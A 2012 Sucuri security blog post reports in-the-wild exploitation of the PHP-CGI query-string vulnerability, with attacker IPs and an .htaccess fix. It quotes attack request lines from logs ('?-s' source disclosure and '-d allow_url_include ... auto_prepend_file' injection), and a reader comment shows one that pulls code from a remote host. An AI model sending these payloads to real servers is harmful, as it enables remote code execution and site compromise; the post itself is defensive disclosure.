• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

PHP-CGI Vulnerability Exploited in the Wild

May 8, 2012Daniel Cid

FacebookTwitterSubscribe

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we noticed that the attack starts in two ways, either by checking if the server is vulnerable using the ?-s option (which shows the source of the page):

88.198.51.36 – – [06/May/2012:07:51:36 -0400] “GET /index.php?-s HTTP/1.1″ 301

Or by including the content of the PHP input (or of an external shell):

84.247.61.27 – – [07/May/2012:17:16:58 -0400] “POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1” 301 – “-” “-”

If the attacker succeeds, it will upload a backdoor to the compromised site in a random location of the file system and use that to continue exploiting the server.

It is also important to note that even though we are only seeing those two “flags” being used (-s and -d), php-cgi has many options and any of them can be used:

$ php-cgi -h
-a Run interactively
-b | Bind Path for external FASTCGI Server mode
-C Do not chdir to the script’s directory
-c | Look for php.ini file in this directory
-n No php.ini file will be used
-d foo[=bar] Define INI entry foo with value ‘bar’
-e Generate extended information for debugger/profiler
-f Parse . Implies `-q’
-h This help
-i PHP information
-l Syntax check only (lint)
-m Show compiled in modules
-q Quiet-mode. Suppress HTTP Header output.
-s Display colour syntax highlighted source.
-v Version number
-w Display source with stripped comments and whitespace.
-z Load Zend extension .
-T Measure execution time of script repeated times.

Attacker IP addresses

Via our honeypots, we detected the following IP addresses trying to exploit this vulnerability:

# [Number of hits] [IP Address]
191 85.114.141.40
120 91.224.160.132
44 84.247.61.27
32 94.242.199.77
18 91.227.142.126
10 80.244.248.70
7 88.228.101.221
5 190.245.104.190
5 88.228.104.94
5 88.228.114.235
3 71.163.209.143
2 177.8.168.3
2 88.228.122.158
2 190.44.25.254
2 88.198.51.36
1 91.77.240.51

And this number is probably going to grow even more.

Protecting yourself

The PHP guys are recommending the following .htaccess hack to block those attacks:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|- [NC]
RewriteRule .? – [F,L]

But the best option is to update PHP ASAP (a fix is available for it already), or stop using the CGI setup and move to to the PHP module (if using Apache), or Fast CGI.

More details to come!


Update 1:
*Facebook is playing with this vulnerability and added the following job link on their page: https://facebook.com/?-s (for anyone that is probing for this):

include_once ‘https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS’;

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Jon Brown

    May 8, 2012

    That Facebook update is awesome 🙂

  2. Will

    May 9, 2012

    Until WHM/CPanel comes out with an update, is it possible to thwart this at a server level, or would we need to add that snippet to every website’s htaccess file?  

  3. jibudada

    May 18, 2012

    good stuff. keep it up. have a look on this also.
     http://www.securitytube.net/groups?operation=view&groupId=7

  4. Anonymous Me

    June 22, 2012

    In C:WINDOWSsystem32LogFilesHTTPERR
    I discovered entries such as:

    2012-06-20 20:59:21 122.183.65.5 59537 ***.***.***.*** 80 HTTP/1.1 POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://216.67.238.249/images/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://216.67.238.249/images/api.gif%20-n 411 – LengthRequired –

    Using tool: http://www.webtoolhub.com/tn561351-url-deobfuscator.aspx
    That URL deobfuscates to:

    /?-d allow_url_include=On+-d auto_prepend_file=http://216.67.238.249/images/api.gif -n/?-d allow_url_include=On+-d auto_prepend_file=http://216.67.238.249/images/api.gif -n

    Note the IPs referenced:
    216.67.238.249
    122.183.65.5
     

  5. Sajid Toor

    November 2, 2012

    Highly descriptive
    post, I enjoyed that bit. Will there be a part 2?

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.